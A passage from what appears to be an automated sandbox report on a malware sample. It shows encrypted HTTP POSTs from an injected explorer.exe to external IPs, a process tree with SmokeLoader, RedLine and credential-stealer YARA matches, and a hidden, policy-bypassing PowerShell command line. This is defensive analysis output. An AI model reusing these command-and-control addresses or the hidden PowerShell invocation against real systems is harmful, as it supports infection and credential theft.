                                                                              2024-07-27 12:56:00 UTC1267OUTData Raw: 48 62 36 76 6c 59 68 2b 66 4f 4b 78 4d 67 6b 4c 51 34 71 6b 44 4d 37 56 37 32 6c 53 51 55 51 49 48 4d 33 4d 59 6b 65 47 59 31 76 51 42 57 6b 76 71 4c 65 55 57 41 32 74 74 42 38 72 43 54 45 65 2b 44 4c 62 55 73 4b 68 30 72 66 44 75 70 48 6e 6b 79 47 49 46 68 68 4c 65 34 41 77 79 61 7a 31 4a 78 4b 68 6d 42 6e 45 6b 4d 33 70 33 45 35 2f 68 47 6c 76 6e 66 53 4d 6d 73 72 71 59 41 65 36 79 76 55 32 6d 46 7a 47 79 73 39 6d 75 4e 4e 54 4a 57 6a 42 68 6a 39 39 71 6d 78 4b 61 4d 65 61 70 70 33 75 58 37 78 61 56 49 74 5a 36 35 6e 35 55 32 63 35 4e 75 57 51 64 6a 71 43 71 45 32 4a 6e 44 51 62 49 2f 39 49 37 52 68 6c 2f 44 4f 45 51 48 73 4c 46 4b 6c 36 6e 48 74 34 34 70 52 39 64 6d 30 6a 2f 43 72 35 6a 67 35 77 62 61 45 35 53 5a 6a 31 4d 51 58 57 4e 6c 39 34 46 33 33
                                                                              Data Ascii: Hb6vlYh+fOKxMgkLQ4qkDM7V72lSQUQIHM3MYkeGY1vQBWkvqLeUWA2ttB8rCTEe+DLbUsKh0rfDupHnkyGIFhhLe4Awyaz1JxKhmBnEkM3p3E5/hGlvnfSMmsrqYAe6yvU2mFzGys9muNNTJWjBhj99qmxKaMeapp3uX7xaVItZ65n5U2c5NuWQdjqCqE2JnDQbI/9I7Rhl/DOEQHsLFKl6nHt44pR9dm0j/Cr5jg5wbaE5SZj1MQXWNl94F33
                                                                              2024-07-27 12:56:01 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:56:01 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:56:01 UTC685INData Raw: 6f 41 37 37 48 67 4c 31 53 33 59 35 57 6a 42 69 56 4d 74 6c 42 76 65 6a 33 46 5a 49 43 78 7a 35 2f 70 77 6d 72 35 48 69 6d 62 4d 54 4c 37 59 77 78 62 46 4f 39 76 2f 69 48 6c 53 71 58 37 46 49 59 6b 48 30 2b 44 76 48 67 4d 62 35 2f 55 4a 77 74 68 69 68 4e 48 62 71 64 43 45 78 71 46 74 74 36 72 58 51 62 70 55 64 69 4f 59 41 49 36 57 53 35 47 4d 75 34 41 72 57 6e 44 50 6e 34 37 70 74 78 53 64 67 69 6f 34 59 71 31 63 69 47 33 32 74 31 62 48 51 78 55 7a 53 32 62 51 72 70 38 38 37 6c 4b 38 55 6d 47 32 45 75 42 66 31 43 52 47 46 2b 4e 46 79 30 63 33 72 6c 6e 76 69 68 52 5a 31 4c 6b 39 7a 39 77 4b 71 68 64 68 47 39 51 7a 4a 2f 62 5a 34 53 77 6a 48 55 38 36 76 48 61 48 71 2b 30 51 63 2b 4c 79 31 4b 55 77 56 33 59 31 33 79 50 6a 72 78 65 55 77 59 67 6f 6c 43 77 6c
                                                                              Data Ascii: oA77HgL1S3Y5WjBiVMtlBvej3FZICxz5/pwmr5HimbMTL7YwxbFO9v/iHlSqX7FIYkH0+DvHgMb5/UJwthihNHbqdCExqFtt6rXQbpUdiOYAI6WS5GMu4ArWnDPn47ptxSdgio4Yq1ciG32t1bHQxUzS2bQrp887lK8UmG2EuBf1CRGF+NFy0c3rlnvihRZ1Lk9z9wKqhdhG9QzJ/bZ4SwjHU86vHaHq+0Qc+Ly1KUwV3Y13yPjrxeUwYgolCwl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              97192.168.2.449881167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:56:02 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:56:02 UTC1122OUTData Raw: 6b 67 69 31 58 35 30 38 55 72 36 4b 2f 72 6d 47 56 6c 30 6a 78 48 43 46 6e 54 4f 51 64 38 58 7a 42 49 78 39 51 78 64 6b 49 58 69 7a 33 67 78 78 79 36 55 6e 44 43 53 50 35 72 4c 69 77 61 67 4c 38 72 64 36 71 42 73 67 45 5a 43 49 2f 4c 58 79 34 36 53 62 34 32 72 50 57 59 34 79 42 37 59 4b 58 68 53 30 50 59 31 5a 2b 37 46 36 45 30 57 76 49 70 53 5a 6b 75 30 4d 6b 6b 2f 44 45 47 73 49 41 62 6a 54 63 52 78 38 6c 2b 5a 36 6c 41 49 45 74 46 48 4f 53 4e 57 73 75 78 69 55 74 67 35 50 52 76 45 7a 38 6b 2f 64 65 68 50 66 43 4b 39 47 6b 69 46 37 78 7a 31 58 2f 2f 73 4a 4d 35 6d 45 76 33 36 5a 68 37 62 32 50 49 68 71 35 75 66 51 44 45 64 35 41 41 71 6c 41 34 4f 4a 36 36 59 6c 71 6c 34 78 68 58 74 2b 51 59 49 6e 54 47 69 41 6e 30 6d 53 51 50 63 56 6a 6a 78 4c 4c 58 37
                                                                              Data Ascii: kgi1X508Ur6K/rmGVl0jxHCFnTOQd8XzBIx9QxdkIXiz3gxxy6UnDCSP5rLiwagL8rd6qBsgEZCI/LXy46Sb42rPWY4yB7YKXhS0PY1Z+7F6E0WvIpSZku0Mkk/DEGsIAbjTcRx8l+Z6lAIEtFHOSNWsuxiUtg5PRvEz8k/dehPfCK9GkiF7xz1X//sJM5mEv36Zh7b2PIhq5ufQDEd5AAqlA4OJ66Ylql4xhXt+QYInTGiAn0mSQPcVjjxLLX7
                                                                              2024-07-27 12:56:03 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:56:03 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:56:03 UTC685INData Raw: 63 58 70 77 74 50 6b 53 50 45 63 47 4b 74 53 76 45 46 75 43 32 44 63 64 4d 35 61 6f 67 53 7a 62 4b 6c 5a 47 44 71 38 7a 4e 50 66 48 63 32 44 77 48 49 65 4b 71 30 43 4c 37 7a 62 75 7a 33 73 46 43 52 48 2f 55 70 6d 6a 34 4a 72 77 79 68 34 53 34 62 53 65 6d 6e 39 54 39 71 69 78 33 49 42 6b 6f 68 38 6a 75 42 75 77 51 6c 4e 6f 7a 70 64 4b 31 44 4f 33 44 62 6e 4a 33 63 72 71 37 33 56 68 30 4b 4e 48 67 47 4e 69 46 77 56 4f 36 37 6a 41 6c 7a 69 56 42 62 42 33 35 37 37 32 6d 67 65 35 79 50 73 55 64 6a 6a 34 41 74 4a 63 35 79 4b 46 6c 54 44 35 4d 4a 47 54 41 38 30 72 63 51 6f 6c 41 39 48 74 71 78 37 67 4b 2f 72 6a 6f 63 74 48 74 31 2b 39 71 31 6c 64 5a 65 7a 75 39 75 58 32 53 70 67 61 32 6a 68 34 67 78 32 71 68 6c 68 71 7a 68 73 53 59 66 42 50 67 6d 45 4d 6f 4d 42
                                                                              Data Ascii: cXpwtPkSPEcGKtSvEFuC2DcdM5aogSzbKlZGDq8zNPfHc2DwHIeKq0CL7zbuz3sFCRH/Upmj4Jrwyh4S4bSemn9T9qix3IBkoh8juBuwQlNozpdK1DO3DbnJ3crq73Vh0KNHgGNiFwVO67jAlziVBbB35772mge5yPsUdjj4AtJc5yKFlTD5MJGTA80rcQolA9Htqx7gK/rjoctHt1+9q1ldZezu9uX2Spga2jh4gx2qhlhqzhsSYfBPgmEMoMB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              98192.168.2.449882107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:56:04 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:56:04 UTC1122OUTData Raw: 6e 32 69 66 56 4b 6a 6d 34 37 65 44 70 51 68 6a 57 4a 4d 62 30 41 56 48 32 37 50 5a 2b 61 65 57 6d 79 65 61 4c 79 36 6c 34 65 37 41 4f 39 66 58 4a 70 54 47 71 42 49 6a 52 6d 46 34 67 50 66 66 45 43 70 41 69 4e 77 61 59 4c 68 55 50 50 48 38 53 45 69 53 2f 6d 55 2f 50 45 56 6a 58 6d 46 36 6c 73 50 36 71 6c 42 6d 61 32 51 7a 4d 33 30 62 4d 54 64 6d 52 6f 44 34 46 32 75 32 62 51 58 70 54 32 48 6b 68 46 34 4b 4f 67 4a 74 66 64 59 64 30 43 77 78 69 6b 79 59 39 35 56 67 4d 4e 43 58 76 79 6b 45 55 34 37 6a 56 47 64 59 32 48 35 7a 47 56 62 30 35 34 73 4e 62 73 42 48 78 30 49 51 78 6b 69 57 41 34 6e 6d 50 34 41 48 71 78 76 50 72 76 70 7a 33 58 46 73 4a 76 32 6b 51 56 6e 64 41 36 69 7a 4b 37 62 36 4a 7a 38 4d 61 32 62 4d 64 35 6d 31 43 2f 70 63 75 66 63 75 73 75 52
                                                                              Data Ascii: n2ifVKjm47eDpQhjWJMb0AVH27PZ+aeWmyeaLy6l4e7AO9fXJpTGqBIjRmF4gPffECpAiNwaYLhUPPH8SEiS/mU/PEVjXmF6lsP6qlBma2QzM30bMTdmRoD4F2u2bQXpT2HkhF4KOgJtfdYd0CwxikyY95VgMNCXvykEU47jVGdY2H5zGVb054sNbsBHx0IQxkiWA4nmP4AHqxvPrvpz3XFsJv2kQVndA6izK7b6Jz8Ma2bMd5m1C/pcufcusuR
                                                                              2024-07-27 12:56:05 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:56:05 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:56:05 UTC685INData Raw: 4c 71 42 64 38 63 46 4c 66 61 53 45 6d 45 62 35 46 50 74 68 57 63 61 74 4f 73 31 41 71 56 45 47 57 72 4c 62 75 43 51 55 73 32 38 77 37 47 4d 30 72 34 78 4a 63 68 72 51 50 4f 37 67 63 48 7a 39 6b 4a 76 35 37 42 52 2f 55 76 65 41 50 67 31 49 62 6c 65 33 75 52 77 4d 4a 77 59 54 39 79 61 64 74 77 51 46 2f 6c 38 55 59 73 47 45 2f 34 71 31 66 61 57 49 44 42 38 44 5a 44 62 72 65 6f 74 70 58 4b 6e 4f 77 58 32 2f 61 65 43 59 65 43 46 43 71 68 5a 47 6d 54 4d 47 6e 67 53 4d 2b 64 78 68 62 34 31 61 59 51 39 59 42 38 76 38 4d 31 51 59 42 39 37 32 78 68 31 49 70 4a 6b 67 38 6b 42 53 53 79 34 71 6c 2b 59 36 71 35 68 2b 4c 51 36 39 4e 68 39 30 78 32 49 52 68 67 51 32 35 68 4a 79 76 38 41 57 69 4b 52 48 57 64 7a 38 63 64 78 6f 66 53 37 38 67 57 6e 41 6c 4a 39 2b 75 46 32
                                                                              Data Ascii: LqBd8cFLfaSEmEb5FPthWcatOs1AqVEGWrLbuCQUs28w7GM0r4xJchrQPO7gcHz9kJv57BR/UveAPg1Ible3uRwMJwYT9yadtwQF/l8UYsGE/4q1faWIDB8DZDbreotpXKnOwX2/aeCYeCFCqhZGmTMGngSM+dxhb41aYQ9YB8v8M1QYB972xh1IpJkg8kBSSy4ql+Y6q5h+LQ69Nh90x2IRhgQ25hJyv8AWiKRHWdz8cdxofS78gWnAlJ9+uF2


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              99192.168.2.449884107.173.160.139443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:56:06 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:56:06 UTC1267OUTData Raw: 5a 37 4d 64 56 41 39 4e 63 2b 54 4f 43 74 4d 38 7a 36 49 61 59 33 36 30 46 33 75 57 33 44 45 38 62 73 55 77 4f 58 52 39 58 76 42 6c 50 4a 58 78 54 50 4f 62 69 6b 6e 4a 2f 74 6b 72 47 73 73 2f 43 78 46 73 46 6c 35 6e 4e 31 43 36 79 71 36 30 56 6b 53 58 4f 45 45 6a 2b 53 64 47 4e 61 39 4a 50 6e 61 34 46 79 37 36 30 45 4b 7a 41 43 4d 41 31 54 54 72 39 5a 67 77 32 66 6e 4e 6e 4b 69 35 65 59 4a 36 77 63 35 42 73 57 59 45 38 72 37 2b 43 32 59 34 5a 2b 51 37 4b 64 52 62 2f 56 6e 36 58 67 35 74 4f 55 45 43 39 4c 73 79 41 56 67 6b 4e 6b 36 73 41 76 48 4a 54 64 31 75 61 79 6c 4e 4a 48 65 57 66 41 6b 47 77 46 45 2b 56 73 52 64 2f 62 77 73 39 76 5a 6f 72 52 46 51 67 49 65 37 61 58 69 65 6e 31 74 78 4e 36 58 61 51 2b 49 65 4f 4f 39 31 2f 2b 2b 5a 76 53 48 66 62 71 68
                                                                              Data Ascii: Z7MdVA9Nc+TOCtM8z6IaY360F3uW3DE8bsUwOXR9XvBlPJXxTPObiknJ/tkrGss/CxFsFl5nN1C6yq60VkSXOEEj+SdGNa9JPna4Fy760EKzACMA1TTr9Zgw2fnNnKi5eYJ6wc5BsWYE8r7+C2Y4Z+Q7KdRb/Vn6Xg5tOUEC9LsyAVgkNk6sAvHJTd1uaylNJHeWfAkGwFE+VsRd/bws9vZorRFQgIe7aXien1txN6XaQ+IeOO91/++ZvSHfbqh
                                                                              2024-07-27 12:56:07 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:56:07 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:56:07 UTC685INData Raw: 52 33 31 41 64 2f 31 51 58 65 6d 79 6a 79 71 50 37 43 49 5a 34 72 6e 64 69 66 4b 34 30 62 47 2f 44 63 4b 68 57 52 4c 58 69 6b 43 49 45 77 43 48 7a 71 44 6d 73 38 31 50 31 31 4a 62 58 32 67 68 71 48 53 62 35 64 47 6c 47 68 37 75 77 4a 67 41 39 31 48 76 4a 68 35 33 76 45 39 6b 41 30 2b 55 37 34 68 55 65 72 65 7a 64 65 45 61 41 32 63 65 49 4b 71 30 67 70 4c 75 7a 77 55 55 59 78 44 63 4f 6d 32 6a 42 41 6e 54 51 79 7a 53 6e 43 64 32 34 32 75 6a 68 32 39 4f 50 37 6c 4a 48 47 54 43 50 41 6e 53 48 61 35 51 30 58 47 50 51 76 68 71 2f 6a 56 54 75 46 47 62 71 42 37 30 59 4f 4b 2b 58 64 38 61 5a 55 33 59 73 43 2f 2b 68 5a 64 4f 70 4e 6c 73 65 4d 58 4e 41 64 69 6a 58 5a 31 36 7a 4b 4d 30 55 47 77 39 32 61 72 75 39 6c 50 2b 78 47 67 53 36 4d 47 75 57 4a 68 48 57 32 4f
                                                                              Data Ascii: R31Ad/1QXemyjyqP7CIZ4rndifK40bG/DcKhWRLXikCIEwCHzqDms81P11JbX2ghqHSb5dGlGh7uwJgA91HvJh53vE9kA0+U74hUerezdeEaA2ceIKq0gpLuzwUUYxDcOm2jBAnTQyzSnCd242ujh29OP7lJHGTCPAnSHa5Q0XGPQvhq/jVTuFGbqB70YOK+Xd8aZU3YsC/+hZdOpNlseMXNAdijXZ16zKM0UGw92aru9lP+xGgS6MGuWJhHW2O


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:08:51:58
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x400000
                                                                              File size:249'856 bytes
                                                                              MD5 hash:0290BDE72B9F8D6F9B1EFDA467DB3A91
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:08:52:05
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff72b770000
                                                                              File size:5'141'208 bytes
                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:08:52:24
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Roaming\sbttifb
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\sbttifb
                                                                              Imagebase:0x400000
                                                                              File size:249'856 bytes
                                                                              MD5 hash:0290BDE72B9F8D6F9B1EFDA467DB3A91
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2008845370.00000000026EE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2008604231.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 37%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:08:53:02
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                              Imagebase:0x7ff6cc330000
                                                                              File size:988'672 bytes
                                                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 71%, ReversingLabs
                                                                              • Detection: 72%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:08:53:02
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:08:53:16
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\60FC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\60FC.exe
                                                                              Imagebase:0x7ff7e7250000
                                                                              File size:11'672'576 bytes
                                                                              MD5 hash:D3785ED170CDB1F4784D3DFF3A61DAE0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:Go lang
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2599552329.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.2458376927.00007FF7E7790000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.2594891132.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000003.2544868852.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\60FC.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 50%, ReversingLabs
                                                                              • Detection: 71%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:08:53:20
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              Imagebase:0x12b422e0000
                                                                              File size:141'944 bytes
                                                                              MD5 hash:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              • Detection: 0%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:12
                                                                              Start time:08:53:22
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6BC6.exe" -HOSTRUNAS
                                                                              Imagebase:0x29580180000
                                                                              File size:141'944 bytes
                                                                              MD5 hash:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:08:53:27
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              Imagebase:0x2b0000
                                                                              File size:231'736 bytes
                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2642232685.0000000002843000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2676158803.0000000002808000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:08:53:28
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:08:53:28
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:08:54:43
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6267.exe"
                                                                              Imagebase:0x7ff6cc330000
                                                                              File size:988'672 bytes
                                                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:08:54:43
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:08:54:52
                                                                              Start date:27/07/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6267.exe"
                                                                              Imagebase:0x7ff6cc330000
                                                                              File size:988'672 bytes
                                                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:08:54:52
                                                                              Start date:27/07/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

